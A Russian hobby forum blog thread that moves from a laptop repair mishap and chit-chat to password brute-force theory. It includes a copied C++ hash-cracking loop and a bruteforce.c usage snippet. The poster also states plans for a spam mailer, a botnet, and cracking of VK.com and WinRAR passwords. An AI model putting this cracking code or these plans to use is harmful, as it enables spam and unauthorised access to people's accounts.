IMAGE (https://hpc.name/redirector.html#http://hotline.ua/img/tx/773/7735155.jpg) http://hotline.ua/img/tx/773/7735155.jpg

IMAGE (https://hpc.name/redirector.html#http://hotline.ua/img/tx/773/7735175.jpg) http://hotline.ua/img/tx/773/7735175.jpg

После того, как я купил роутер и его настроил мне припекло купить кабель на 3 метра, так как 1 метровый до системника(хз будет ли он вообще, я камп 3 года покупаю), пошел я на базар купил...

Прихожу домой думаю, что же вот это делать, хм глянул на ноут и сложилось божественное уравнение:

Цитата:

скука+работа+старый_ноут+мы сль_он_же_забит_и_его_нада_п чистеть+инструменты под рукой = разбор ноута не зная, как он устроен

Пошел я его колупать, ах какой я дурак, не посмотрел, как он устроен...
Начал разбирать, поснимал все и оказалось, что не все болты вынты, я думаю как же так, все же отлично, позвал я батю и сказал:"Пап, я ноут разобрал но не могу вытянуть плату" - он рвонул и все..выяснилось вырвал шурупы. Я то не заметил что панелька там, где кнопочки мигают снимается, там были те шурупы...Но на этом история только начинается.....

Раскрутил, закрутил, давай собирать обратно и бац проводки до клавы не подключаются, я давай подключил, но не работает клава, и тут я осознал каким же нада быть д********, что не посмотреть мануал по разборке этой серии ноутов.
Посмотрел в гугле, снял панельку все как сказано и мне картинка: дробленная пластмасса и вырванные шурупы. Снял клаву. оказалось под ней куча варенья)))подсоединил все, думаю все гуд летать все будет. Да не было рая, был ад...Вылетает окохо типа у меня не 1гб ОЗУ, а 512мб, я думаю все вроде ок, ну опять раскрутил отсек с ОЗУшкой, все закрепил, стартую...
Давай печать, а у меня несколько клавиш не работает. Доразбирался....

Ну через неделю купил клавиатуру за 140грн\560р.
с надписью сзади на корпусе "Маде ин Чина"

Работа, жил я нормально...Пока позавчера не сломался пробел..объясню примерно так:

Цитата:

вобщем есть такие закрепки которые держут металлическую рамку, а те заклепки из пластмассы, вот они и сломались, ну они поддерживают пробел и не дают болтаться со стороны в сторону, вот он шатается, жутко перетруждается кисть при нажатии на пробел, он же плавный, что бы нажать нада вдавить в него..вот таки то дела)))

_Werewolf_
Приключение русских в Украине =)
А где в уравнении здравый смысл, хорошая память что откуда выкручивал и внимательность, дабы не выломать брутфорсом?
Клаву надо покупать ТОЛЬКО после ЛИЧНОЙ проверки на нажатия. НЕ ИНАЧЕ!

ZoRKeG
Я вот когда свой планшет разбирал так тоже без инструкций всё делал, ибо китайским инструкциям не доверяю, так вот, сам планшет успешно разобрал, потом решил его патроха на части разобрать, а за ними и до сломанного дисплея добрался, который тоже разобрал на части -) В итоге, когда начала всё присобачивать на свои места, то целый час мудохался со соединением дисплея к плате, пока не дошло, что там была какая-то заковырочка с кнопочкой, которую нужно нажать и зажать шлейф, вообщем, китайцы хитрые. Сейчас колбачку на нем удобно резать =) Думаю на части пустить его да перепаять...

_Werewolf_
Ну вы даёте =)
Может тогда было бы неплохо фотографировать что и как? Я тоже не один раз разбирал аппаратуру. И хотя я с паяльником - это хуже, чем макака с гранатой, но никогда проблем со сборкой не было.

Gelonavi
Ох, шит. Чувак, уменьшай картинки. Глаза режит.
А вообще это тебе урок прежде чем взять отвертку погугли как сий девайсину разобрать.

ZoRKeG
Цитата:

Сообщение от _Werewolf_

И хотя я с паяльником - это хуже, чем макака с гранатой, но никогда проблем со сборкой не было.

Я с паяльником дружу, да и работать с ним тоже люблю =)

oxigen
17.04.2014, 01:00
Куда пропал?
Давно не видно на форуме...

_Werewolf_
17.04.2014, 01:00
Он покинул нас *за кадром снимаю шлюхяпу *

vladyxa13
17.01.2015, 01:00
Цитата:

Сообщение от _Werewolf_

Он покинул нас *за кадром снимаю шлюхяпу *

Нидажлешься!
Думали я вас так просто оставлю!

vladyxa13
17.01.2015, 01:00
На днях катался в метро. Заехал на конечную(академгородок). Смотрю там ребята сидят, а ними дерегирует бабуля, это волонтеры были или "волонтеры", на АТО бабки собирают. Я был в шоке. Просто из-за того что удостоверение и лицензию подделать можно, а наш наивный народ то баблосы кидает в урну, не проверяя с какой он организации. хотя это наш менталитет больше виноват, и гривны на действительно благое дело не жалко, но я видел просто много вакансий на этих "волонтеров", зарплата на студента и эта бабуля комиссию же берет, ну кароч схема хороша....метро всегда прибыльный бизнес - купил билетик за 2 гривны, накатался на 50.

ZoRKeG
18.01.2015, 01:00
Цитата:

Сообщение от vladyxa13

На днях катался в метро. Заехал на конечную(академгородок). Смотрю там ребята сидят, а ними дерегирует бабуля, это волонтеры были или "волонтеры", на АТО бабки собирают. Я был в шоке. Просто из-за того что удостоверение и лицензию подделать можно, а наш наивный народ то баблосы кидает в урну, не проверяя с какой он организации. хотя это наш менталитет больше виноват, и гривны на действительно благое дело не жалко, но я видел просто много вакансий на этих "волонтеров", зарплата на студента и эта бабуля комиссию же берет, ну кароч схема хороша....метро всегда прибыльный бизнес - купил билетик за 2 гривны, накатался на 50.

Академка? Я к тебе в Киев приеду

vladyxa13
Цитата:

Сообщение от ZoRKeG

Академка? Я к тебе в Киев приеду

жду..свяжемся
там в ЛС маякнешь и постарайся на выходные
по центру погуляем

ZoRKeG
Цитата:

Сообщение от vladyxa13

жду..свяжемся
там в ЛС маякнешь и постарайся на выходные
по центру погуляем

Это уже как получится, когда буду свободен - могу приехать, даже на денёк, мне всё равно нефиг делать ))

vladyxa13
Завтра на Крещение поеду!! Точно! В прошлом году купался, отлично было.

d0ker77@mail.ru
19.01.2015, 01:00
С возвращением!

i368
22.01.2015, 01:00
Четкий бложек

vladyxa13
24.01.2015, 01:00
На днях вспомнил шкАлльничков... И спасибо им за тупые вопросы "Как взломать почту, вк, т.п.".
И здесь меня осенило!
У нас есть брут, который берет имя аккаунта и подставляет пароли
или
берет имя аккаунты и подставляет пароль
Пример:

code:

Пароль: Петя
Пасворд: Петя3000

1 - У нас есть листинг паролей и мы под "Петя" подставляем(перебираем) и отправляем правильный пароль в результат.
Пароли

code:

Вася
Маша
ДашунИвановичя 01
Петро
Алибббаба
Петя3000
Петяа

Ну а во втором все наоборот! Мы берем пароль и ищем имя аккаунта хотя это бред имя ака всегда можно узнать, разве, что ты не брутишь "в слепую".

Ну о все инфе приведенной выше знают все, без исключения, для вас друзья это детский сад....

Да здравствуй УАПП(Универсальный алгоритм подбора паролей)!
Аналогов в интернетах я не искал - говорю прямо и сразу, тыкать ссыльку, если чет накопаете. Возможно он не новый и не раз кому-то приходил в голову.
Кода под него нет. Алгоритм недоработанный!!! Есть только теория, которую надо еще доделать и усовершенствовать. Надеюсь я его запилю и вы мне в этом поможете, если захотите.

И так приступим к делу...

Как взломать сейф???
Давайте допустим, что сейф имеет 2-ух значный пароль, состоящий и цифр(1,2).
Подбор выйдет такой

code:

12
21
11
22

А что это значит? Ответ - ничего!

Давайте допустим, что сейф имеет 3-х значный пароль, состоящий и цифр(1,2,3).
Подбор выйдет такой

code:

11
22
33
21
31
23
32
13
12

вухуху

Если мы умножим
code:

допустимые значения пароля х длинну пароля = количество вариантов пароля

Я продумал(Как Капитан очевидность) все варианты

code:

0...1..8..9
a-z
A-Z
а-я
А-Я
ї ъ ( ) ' ' " " $ ; ! - = + ? , .

допустимые значения пароля = 10+26+26+33+33+20 = 148
MAX_PASS = 32 - примерная длинная пароля у юзеров(на таких продвинутых)

В дальнейшем будем применять:
MAX_PASS - максимальная длинна пароля
VALID_VAL_PASS - допустимые значения пароля

Что бы вычислить варианты(количество) я сделал так6
MAX_PASS * VALID_VAL_PASS * VALID_VAL_PASS = 700928

Вот теперь надо придумать цикличность, то есть как оно будет выполнятся в коде.
Думаю первым пойдет цикл с 32 итерациями.

Давайте ребят. До встречи! Просто уже утро, вчера был вечер и я его писал(алгоритм), а утром мысли размытые...Может за день мысля хоть какая стукнет по башке! Буду надеяться!
Это не статья, она написана в блоге, это размышления....

Ну а с вами был vladyxa13

Всех благ вам!

vladyxa13
24.01.2015, 01:00
вот шарюсь и понял. что идея не новая
просто гуглить надо
но там куски кода
из них я уже и соберу свое творение

https://ru.wikipedia.org/wiki/Перебор паролей (https://hpc.name/redirector.html#https://ru.wikipedia.org/wiki/%D0%9F%D0%BE%D0%BB%D0%BD%D1%8B%D0%B9_%D0%BF%D0%B5% D1%80%D0%B5%D0%B1%D0%BE%D1%80http://)

Цитата:

Если пространство решений очень велико, то полный перебор может не дать результатов в течение нескольких лет или даже столетий.

взбодрило

еще первичную проверку буду делать через

C++ highlight

#include
//дальше подключаем библиотеки
using
namespace
std;
int main()
{
do
{
//Подбор...PASS
}
while
(
strcmp
(PASS,
"пароль"
) !=
0
);
cout <<
"Пароль подобран успешно: "
<< PASS;
//предложение повторить подобрать еще разок
return
0
;
}

Пойду брать бубон......
Так все я запутался, одной головы мало...над подоставать кого-то, может бабуля поможет
все сворачиваю до вечера..у меня перегруз, пойду нука с зором в чатике

vladyxa13
10.02.2015, 01:00
Цените сон!

i368
Цитата:

Сообщение от vladyxa13

Цените сон!

Если спать, то на парах

kipishnoy
Цитата:

Сообщение от vladyxa13

Цените сон!

Не берет твой сон)

vladyxa13
14.02.2015, 01:00
Наступает еще одна ночь.
Включаю музыку, открываю фотошоп, начинаю изучать его...хех над дизайн же сайта пилить....
Думаю потом велосипеды свои доделать...
1. Фейк на шапах, соль в том, что хочу норм дизайн научится мутить.
2. Софт для мыла потом выложу. Тип спамер и с использованием сендера ника, чет такое.

Идейки:
1. Для практики замутить метод полного перебора.
2. Страый добрый бот-нет, про который когда-то расказывал.

Вот фотошоп учу, писец, не люблю жутко тупить.

Хех, ну эт заметки для себя, пожалуй оставлю здесь.

vladyxa13
Once, once, I met you
And a few months later
I realized that I can not live without you,
Mine Stranger!

Know that one day I will come to you
And you hug.
I'm sorry for what followed you,
But it's all because he could not stop looking at your beauty!

You laugh, smile, eyes, sky,
I would even eternity sitting under your access.
I do not write "goodbye"
you just know,
that time is passed
and I still reveal themselves, My Stranger
But I love you, although you can guess about it, but you do not know

Однажды, когда-то, я встретил тебя
И через несколько месяцев спустя
Я понял, что не могу без тебя,
Незнакомка моя!
Знай, что однажды прийду
И тебя обниму.
Я извиняюсь, за то, что следил за тобой,
Но это все потому, что не мог налюбоваться твоей красотой!
Твой смех, улыбка, глаза небом,
Я бы хоть вечность сидел под твоим подъездом.
Я не пишу «прощай»,
ты только знай,
что продет время
и я все же раскрою себя, Незнакомка Моя

glm1997
Цитата:

Сообщение от vladyxa13

Once, once, I met you
And a few months later
I realized that I can not live without you,
Mine Stranger!

Know that one day I will come to you
And you hug.
I'm sorry for what followed you,
But it's all because he could not stop looking at your beauty!

You laugh, smile, eyes, sky,
I would even eternity sitting under your access.
I do not write "goodbye"
you just know,
that time is passed
and I still reveal themselves, My Stranger
But I love you, although you can guess about it, but you do not know

Однажды, когда-то, я встретил тебя
И через несколько месяцев спустя
Я понял, что не могу без тебя,
Незнакомка моя!
Знай, что однажды прийду
И тебя обниму.
Я извиняюсь, за то, что следил за тобой,
Но это все потому, что не мог налюбоваться твоей красотой!
Твой смех, улыбка, глаза небом,
Я бы хоть вечность сидел под твоим подъездом.
Я не пишу «прощай»,
ты только знай,
что продет время
и я все же раскрою себя, Незнакомка Моя

Ведь это я . Англичанка твоя .

Вы все что в поэты подались ?

vladyxa13
Да я травы начал пить....
Ты крутой англичанка

vladyxa13
Всех с 14-м февраля!!! Кстати.

i368
15.02.2015, 01:00
Цитата:

Сообщение от vladyxa13

Всех с 14-м февраля!!! Кстати.

Вас так-же! безалкоголь онли

vladyxa13
21.02.2015, 01:00
ГыГы
IMAGE (https://hpc.name/redirector.html#http://dota2.ru/img/memes/5366b793d9682b4a3dde5040c37642a6.jpg) http://dota2.ru/img/memes/5366b793d9682b4a3dde5040c37642a6.jpg

vladyxa13
22.02.2015, 01:00
Начал я разработку ФМС, думаю чрез несколько недель выйдет, а может и дней....
Выпущю сырую, потом буду дорабатывать, идей много, повтыкиваю разных модулей, может и сделаю свой хороший велик, ибо изготовление велосипеда повышает опыт программиста.

Софт будет на шарпах.
Если че долбите мозг чеб я его не закидывал, как было рание.
Старые исходники я потерял =(( но принцип работы помню. Сначала он задумывался, как Аноним сендер(типа идет запрос к сендеру Ника и тот отправляет письмо), теперь же хочу с сендером Ника пока не работать, сначало запилю модуль спамера, потом аноним сендер с использованием сендера Ника и чет еще...может парсер по месту жительства людей, что бы спам более эффективным был, не знаю, посмотрим....
я люблю сис кодинг, но меня кумарит то, что я не могу норм бабки рубить с него, вечно балду гоняю и не могу достичь уровня уверености в своих силах
а более простой вариант запилить бате сайт и жить на него меня не очень устраивает. в веб кодинге я чувствую себя не уверенно совсем, хоть учил не учил я тот хтмл и ксс, не люблю дизайн сайтов. попробую запилить все как есть. может он будет и гавенный, но его все равно можно будет в любое время переделать
как и говорил, я имею неплохую фантазию, но нормально реализовать свои заудмы в плане дизайна у меня совсем не очень выходит
думаю, если делать сетку блогов, то только в стиле минимализма

i368
Цитата:

Сообщение от vladyxa13

Начал я разработку ФМС, думаю чрез несколько недель выйдет, а может и дней....
Выпущю сырую, потом буду дорабатывать, идей много, повтыкиваю разных модулей, может и сделаю свой хороший велик, ибо изготовление велосипеда повышает опыт программиста.

Софт будет на шарпах.
Если че долбите мозг чеб я его не закидывал, как было рание.
Старые исходники я потерял =(( но принцип работы помню. Сначала он задумывался, как Аноним сендер(типа идет запрос к сендеру Ника и тот отправляет письмо), теперь же хочу с сендером Ника пока не работать, сначало запилю модуль спамера, потом аноним сендер с использованием сендера Ника и чет еще...может парсер по месту жительства людей, что бы спам более эффективным был, не знаю, посмотрим....
я люблю сис кодинг, но меня кумарит то, что я не могу норм бабки рубить с него, вечно балду гоняю и не могу достичь уровня уверености в своих силах
а более простой вариант запилить бате сайт и жить на него меня не очень устраивает. в веб кодинге я чувствую себя не уверенно совсем, хоть учил не учил я тот хтмл и ксс, не люблю дизайн сайтов. попробую запилить все как есть. может он будет и гавенный, но его все равно можно будет в любое время переделать

Что за ФМС?

vladyxa13
ФулМаилСофт читай выше пост
Будет время по скупу побазарим может чет попилим в вижуалке, я просто полность запарился делать то что мне не по душе, нет вдохновения и в голову не лезет, а объясниьть бате, что не могу норм запилить его сайт очень трудно.

Я полность решился. Для начала разработаю приложение на WinForms потом перенесу на WPF

vladyxa13
Интерфейс моего велика))
IMAGE (https://hpc.name/redirector.html#http://i63.fastpic.ru/big/2015/0222/af/c8b36f5d714cdef9765e82ab3db048af.png) http://i63.fastpic.ru/big/2015/0222/af/c8b36f5d714cdef9765e82ab3db048af.png

vladyxa13
Блин гребаная текстура мешка стоит 1 бакс. В гугле выдает все ссылки на сайтец ru.depositphotos.com ((
Пилю прост бэкграунд бложека в потожопе
Черт! Фигня выходит. А ищо на вордпрес переносить, да новые знания, но метод их добычи не из простых. Все долблю себе мозг и хочу докодить ФулМаилСофт....

vladyxa13
28.02.2015, 01:00
Бубон, танци и Си шарп.
Кароч один изх недоделаных модуей ФМС.

Разбивка фаразы mail_separator_pass на лексемы.
acc = acc@mail.com
separator = ; или : //на сепартиста смахивает, не смешно....
pass = qwerty

C# highlight

string
Text =
"todio@mail.ru:hdg3725"
;
string
[] separators = {
";"
,
":"
};
string
[] words = Text.Split(separators, StringSplitOptions.RemoveEmptyEntries);

Console.WriteLine(
"Acc: "
+ words[
0
] +
"\n"
);
Console.WriteLine(
"Pass: "
+ words[
1
] +
"\n"
);
Console.ReadKey();

дальше в своем велике я разобью acc еще на две лексемы все по плану))
Бинго!!!

Ток трабла в том че символ разделитель, если будет в пароле, то все к чертям слетит((( но простые люди их не используют

Пойду 15 раз отожмусь и поприседаю, над размятся и чет перекусить...

vladyxa13
28.02.2015, 01:00
Написал все....Осталась главная функция, которая соберет все до кучки и покажет результат проделанной работы. Все остальное мелочи, которые я прикрою. Первая версия будет сырая. Уже сейчас видно элементарные баги(я их прикрыл, но не полностью), выпущю тулзу так, увидим...
Молуль допишу, протестирую, отошлю знакомым, пусть поюзают, а тогда уже и в массы.

vladyxa13
08.03.2015, 01:00
Да детка, да!!!! С***ать smtp, я его сделал.
Кароч я рад как 4-ех летний ребенок машинке))
Был старый дбрый порт 25(смтпишный) по нем и отправлял год назад сообщения. Теперь эта штука не пашет, дак вот накопал я 2525 и все пашет, еще ССЛ врубил и ваще шик =)
Осталось протестировать все сервисы почтовые(там гмаил, маилюру, яша.почта, и тыры пыры), сделать человекочитаемым код, ибо у меня все функции в одном файлике это жесть просто....гыгы я говнокодер
Потом сделаю красиффую форму, не то че у меня, набор кнопочек...
И перенесу на норм диз но эта планы маи пака.
Ну и выложу канешн в паблик формочку, пусть рассылку делают ребята, блин это же надо как-то проксю припаять...порешаю....
IMAGE (https://hpc.name/redirector.html#http://i63.fastpic.ru/big/2015/0308/c9/b72fc577e6d47fc5fa305ee41a11edc9.png) http://i63.fastpic.ru/big/2015/0308/c9/b72fc577e6d47fc5fa305ee41a11edc9.png

И еще, если вы задаетесь вопросом почему я так долго пишу эту прогу, я вам отвечу: нет у меня врмени прост, учеба друзья, все понимают...
Хотя спамер и примитив и здесь мне оправдания нет!

vladyxa13
У меня просто палыхает на кучку переменных под непонятными именами, которые я вызываю по 5 раз.....

vladyxa13
Хех, полностью все снес че накодил, начал переписывать заново, ибо с той кашей работать невозможно. Просто со старого кода все пошагово делать заново. Документировать каждую переменную. что таких ситуаций не возникало. хоть строк 250)) и это очень маленькая прога, но все таки надо что-то решать.

vladyxa13
Решил составить структуру приложения и полностью его переписать, потому что, чем дальше, чем хуже...
С переменными ваще каша, сейчас на листочке делаю иерархию ивлечения лессем и расчитываю сколько нужно переменных.

И еще я понял, что сначала надо на форме создавать главные элементы, а потом аж интерфейс, из-за этого я и сбился.

https://www.youtube.com/watch?v=yWP6Qki8mWc (https://hpc.name/redirector.html#https://www.youtube.com/watch?v=yWP6Qki8mWc) [►]

vladyxa13
Решил полностью структурировать все дествия на бумажке и в электронном виде. Вот иерархия элементов с функциями, схема отправки от начала до конца.

Теперь буду с каждым проектом так делать, ибо просто импровизация, это конечно хорошо. но начинаешь путаться.
[/URL][URL="http://hpc.name/vbimghost.php?do=displayimg&imgid=7603"] (http://hpc.name/vbimghost.php?do=displayimg&imgid=7604)

vladyxa13
14.03.2015, 01:00
Немного полного перебора.

Кароче думал, думал я, насыпал себе хавки, начал кушать и придумал.

Вот мы друзья в жизни повседневной пользуемся десятеричной системой счисления, а цифрами от 0 до 9 соответственно.

Алфавит:

code:

0 1 2 3 4 5 6 7 8 9

Есть пароль. Максимальная длинна которого 6 знаков. Допускаются только цифры.
Что бы узнать длинну пароля в 1 символ нам надо превзойти в степень Алфавит(систему счисления) на ко-ол знаков в пароле.

На выходе из этой кучки слов и букаф выходит человекочитаемая формулка.

code:

libery^MAX_PASS_LEN

Де, друзья, libery - это наша система счиления, а MAX_PASS_LEN - максимальная длинна пароля, и без вкякого бреда который писал в прошлий раз, просто, если умножать, то будет n-ная пропорциональная потеря вариантов.

Едим дальше, пупсики))

Что бы узнать варианты пароля в 1 символ мы поставляем все по нашей чудо формулке, которая сверху.

code:

10^1 = 10

Все вродь легко.....
На выходе получим варианты

code:

0
1
2
3
4
5
6
7
8
9

Смотри пупсик, что бы узнать для 2, 3, 4, 5 и 6 символов мы делаем одинаковые процедуры.

В итоге выходит, что если длинна пароля 6 букафф, а допустимы только цифры, то длина пароля составит один лям(1000000) вариантиков.

Дальше....милашка дальше едим.
Ты хочешь спросить, а что если в пароле нормальном есть букавки. Ну да я знаю. Дабавим все буквы англиского алфавита, маленькие.

Получим:

code:

a-z 0-9

Длинна алфавита сейчас 36.

Все по формулке считаем

и при 6 символах количество вариантов пароля получаем.

И всех взламаемгыгыггыыг

При 6 символах выйдет количество варинатов примерно 2.176.782.336 вариантов. А если брать и с большими буквами, то это 62 символа и результат = 56.800.235.584 вар. Если взять все символы на клавиатурке, то это примерно 150 сим. и на выходе это 11.390.625.000.000 вариантов.
Как сделать перебор от 1 символа до 6. Просто циклом.

Токо, друзья я еще нормально его не тестировал. надо еще понять, как работает перестановка или оно все само выдаст из всех вариантов, чебы подобрать пароль "Вася".

Ну вот проблема. которую надо решить или она уже решена только я не тестировал еще

code:

aaab
aaba
abaa
baaa

Ну вы поняли.

Всем удачки)))

vladyxa13
14.03.2015, 01:00
Прийдется реализовать многопоточность+бонетик неплохой, что бы потянуть такие вычислительные операции. Ибо пасс в 10 сим осилить очень тяжело..
это так мысли в слух...

Вот че откапал в гугле http://zhyk.ru/forum/showthread.php?t=109347 (https://hpc.name/redirector.html#http://zhyk.ru/forum/showthread.php?t=109347)

BlackH
15.03.2015, 01:00
На васме,в статьях, был когда-то не плохой ман как сделать лучший(в плане скорости) перебор.Советую почитать,там с семплами даж.
Ну а так,GPU вам помощь))

vladyxa13
15.03.2015, 01:00
Спасибо BlackH за наводку. Буду что-то читать начитная со следующей недели, ибо пойдут выходные в 2 недели.

vladyxa13
16.03.2015, 01:00
Натягаю в свой бложек кусков материала, потом буду колупаться...

Кодес

C++ highlight

void BruteFunc(char ln[MaxPassLen],int RorUs)
{
int
i=
0
;
char
un=
' '
;
char
tn=
' '
;
char
s[MaxPassLen];
char
st1[MaxPassLen];
bool
flag=
false
;
bool
yes=
false
;
int
tmpRorUs=
-1
;
tmpRorUs=RorUs;
int
MaxNoOfChars=
0
;
int
OptionLowerCaseLetters=
0
;
int
OptionUpperCaseLetters=
0
;
int
OptionNumbers=
0
;
int
OptionSymbols=
0
;
char
line[MaxPassLen]=
""
;
char
alphabet[
128
];
char
NumSet[] =
"0123456789\0"
;
char
LletSet[] =
"abcdefghijklmnopqrstuvwxyz\0"
;
char
UletSet[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ\0"
;
char
SymSet[] =
"!@#$%^&*()'\\/+-=_<>?[]{}\0 "
;
RorUs=
NameInput
(un,tn,RorUs);
cout > MaxNoOfChars;
int
j=
0
;
cout > OptionLowerCaseLetters;
cout > OptionUpperCaseLetters;
cout > OptionNumbers;
cout > OptionSymbols;
if
(OptionLowerCaseLetters)
{
strcpy
(alphabet,LletSet);
flag=
true
;
}
if
(OptionUpperCaseLetters)
{
if
(!flag)
{
strcpy
(alphabet,UletSet);
flag=
true
;
}
else
if
(flag)
strcat
(alphabet,UletSet);
}
// end of UpCaseLet
if
(OptionNumbers)
{
if
(!flag)
{
strcpy
(alphabet,NumSet);
flag=
true
;
}
else
if
(flag)
strcat
(alphabet,NumSet);
}
// end of Num
if
(OptionSymbols)
{
if
(!flag)
{
strcpy
(alphabet,SymSet);
flag=
true
;
}
else
if
(flag)
strcat
(alphabet,SymSet);
}
// end of Sym
if
(!flag)
{
SetConsoleTextAttribute
(hStdout,(
0x0c
));
cout <<
"Error, bad allphabet choise"
<< endl;
SetConsoleTextAttribute
(hStdout,(
0x0a
));
goto
fin;
}
int
i14,i13,i12,i11,i10,i9,i8,i7,i6,i5,i4,i3,i2,i1;
switch
(MaxNoOfChars) {
case
1
:
goto
for1;
break
;
case
2
:
goto
for2;
break
;
case
3
:
goto
for3;
break
;
case
4
:
goto
for4;
break
;
case
5
:
goto
for5;
break
;
case
6
:
goto
for6;
break
;
case
7
:
goto
for7;
break
;
case
8
:
goto
for8;
break
;
case
9
:
goto
for9;
break
;
case
10
:
goto
for10;
break
;
case
11
:
goto
for11;
break
;
case
12
:
goto
for12;
break
;
case
13
:
goto
for13;
break
;
case
14
:
goto
for14;
break
;
}
for14:
for
(i14=
0
;i14<
strlen
(alphabet);i14++)
{line=alphabet[i14];i++;
for13:
for
(i13=
0
;i13<
strlen
(alphabet);i13++)
{line=alphabet[i13];i++;
for12:
for
(i12=
0
;i12<
strlen
(alphabet);i12++)
{line=alphabet[i12];i++;
for11:
for
(i11=
0
;i11<
strlen
(alphabet);i11++)
{line=alphabet[i11];i++;
for10:
for
(i10=
0
;i10<
strlen
(alphabet);i10++)
{line=alphabet[i10];i++;
for9:
for
(i9=
0
;i9<
strlen
(alphabet);i9++)
{line=alphabet[i9];i++;
for8:
for
(i8=
0
;i8<
strlen
(alphabet);i8++)
{line=alphabet[i8];i++;
for7:
for
(i7=
0
;i7<
strlen
(alphabet);i7++)
{line=alphabet[i7];i++;
for6:
for
(i6=
0
;i6<
strlen
(alphabet);i6++)
{line=alphabet[i6];i++;
for5:
for
(i5=
0
;i5<
strlen
(alphabet);i5++)
{line=alphabet[i5];i++;
for4:
for
(i4=
0
;i4<
strlen
(alphabet);i4++)
{line=alphabet[i4];i++;
for3:
for
(i3=
0
;i3<
strlen
(alphabet);i3++)
{line=alphabet[i3];i++;
for2:
for
(i2=
0
;i2<
strlen
(alphabet);i2++)
{line=alphabet[i2];i++;
for1:
for
(i1=
0
;i1<
strlen
(alphabet);i1++)
{
line=alphabet[i1];
line[i+
1
]=
'\0'
;
strcpy
(s,line);
itoa
(User[RorUs].UsNum,st1,
10
);
strcat
(s,st1);
HashFunc
(s);
cout << s;
cout <<
"\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
;
if
(
strcmp
(User[RorUs].Passw,hash)==
0
)
{
yes=
true
;
goto
finish;
}
line=
'\0'
;
if
(i1==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i2==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i3==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i4==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i5==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i6==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i7==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i8==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i9==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i10==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i11==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i12==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i13==
strlen
(alphabet))
goto
finish;
}
i--;
line=
'\0'
;
if
(i14==
strlen
(alphabet))
goto
finish;
}
finish:
if
(
strcmp
(
""
,line)!=
0
&& yes==
true
)
{
SetConsoleTextAttribute
(hStdout,(
0x0f
));
cout <<
'\b'
;
cout <<
"Password is cracked =) ,"
;
cout <<
"here it is - "
<< line << endl;
goto
fin;
}
else
cout <<
'\b'
;
SetConsoleTextAttribute
(hStdout,(
0x0c
));
cerr <<
"Wrong pass legth or alphabet"
<< endl;
SetConsoleTextAttribute
(hStdout,(
0x0a
));
fin:
RorUs=tmpRorUs;
}

Источник: тыц (https://hpc.name/redirector.html#http://forum.codenet.ru/q35210/%D0%9F%D0%BE%D0%BB%D0%BD%D1%8B%D0%B9+%D0%BF%D0%B5% D1%80%D0%B5%D0%B1%D0%BE%D1%80+%28%D0%9E%D0%BF%D1%8 2%D0%B8%D0%BC%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F% 29)

ище... http://www.bearcave.com/random_hacks/permute.html (https://hpc.name/redirector.html#http://www.bearcave.com/random_hacks/permute.html)

vladyxa13
16.03.2015, 01:00
Я почитал здесь (https://hpc.name/redirector.html#http://www.cyberforum.ru/cpp-beginners/thread828201.html) и понял, что можно подобрать каждый элемент пароля, но хотелось что бы оно перебирало само от "a" до "))))))))))". А не просто перебирало каждый элемент массива, хотя для начала мжно и такую шнягу намутить с потоками, что бы один перебирал с начала массива, а второй с конца.

Пойду я спать ибо башка совсем уже не варит....

https://upload.wikimedia.org/wikipedia/commons/c/c4/Dijkstra_flow_chart.ru.svg

vladyxa13
17.03.2015, 01:00
Сново порция умных страницек и букафф для ПП:
Теория брута. Часть 3. C# (https://hpc.name/redirector.html#http://zhyk.ru/forum/showthread.php?t=109347)

http://www.bearcave.com/random_hacks/permute.html (https://hpc.name/redirector.html#http://www.bearcave.com/random_hacks/permute.html)

http://progpage.narod.ru/alg/per.html (https://hpc.name/redirector.html#http://progpage.narod.ru/alg/per.html)

Алгоритм Дейкстры (https://hpc.name/redirector.html#https://ru.wikipedia.org/wiki/Алгоритм_Дейкстры)

Теория графов (https://hpc.name/redirector.html#https://ru.wikipedia.org/wiki/Теория_графов)

https://ru.wikipedia.org/wiki/Множество (https://hpc.name/redirector.html#https://ru.wikipedia.org/wiki/Множество)

.... (https://hpc.name/redirector.html#http://www.cyberforum.ru/cpp-beginners/thread828201.html)

Это все чисто для себя, оставляю это здесь, что бы потом было удобно работать.

vladyxa13
01.04.2015, 01:00
Вырезка коментария из bruteforce.c

гыгыг

code:

So eum.. for the stupid childrens who downloaded this and don't know
how to compile things (get a compiler here : www.gnu.org)
To compile : gcc -o bruteforce bruteforce.c
To use : see bruteforce --help
Tip : use '>' and '|' to pipe the output

Example, a wordlist of all possible password combinations
with 5 chars and lowercase characters only):
~$ bruteforce -s 97 -e 122 -p 5 > words.txt
~$ grep linux words.txt
linux
~$

vladyxa13
04.04.2015, 01:00
С момощью кибер форума нашел неплохой докладный циклический метод перебора, который полность пашет, немного переписал на свой лад и воаля - пашет все, как часики. Осталось дописать модули перебора для вин.рар и ВК.сом. Все это сокеты и ВИНЬ_АПИ. Только вики педия правду толкует дальше 6 символов не поедишь бот-нет нужен и на потоки разбить еще надо. Можно перебирать с начала в одном потоке АААА, а в другом сверху ZZZZ, если успех хоть в одном брут заканчивается.
БлэкН подкинул с васма стаью, на тоже самом основана, только на отладке глянуть надо как работает.
Надо будет еще статью замутить на эту тему, но пока знаний мало в этой области я поизучаю пока

vladyxa13
05.04.2015, 01:00
немного чатика ;D

vladosikus [22:44:17]
актевируйте меня плиз. Строит глазки
vladosikus [22:44:49]
ребят как меня активироваться? Смеющийся
vladosikus [22:45:14]
ну пожалусто кто небудь,, активируйтте меня.
vladosikus [22:46:54]
Ребят Активируйте меня.
vladosikus [22:48:11]
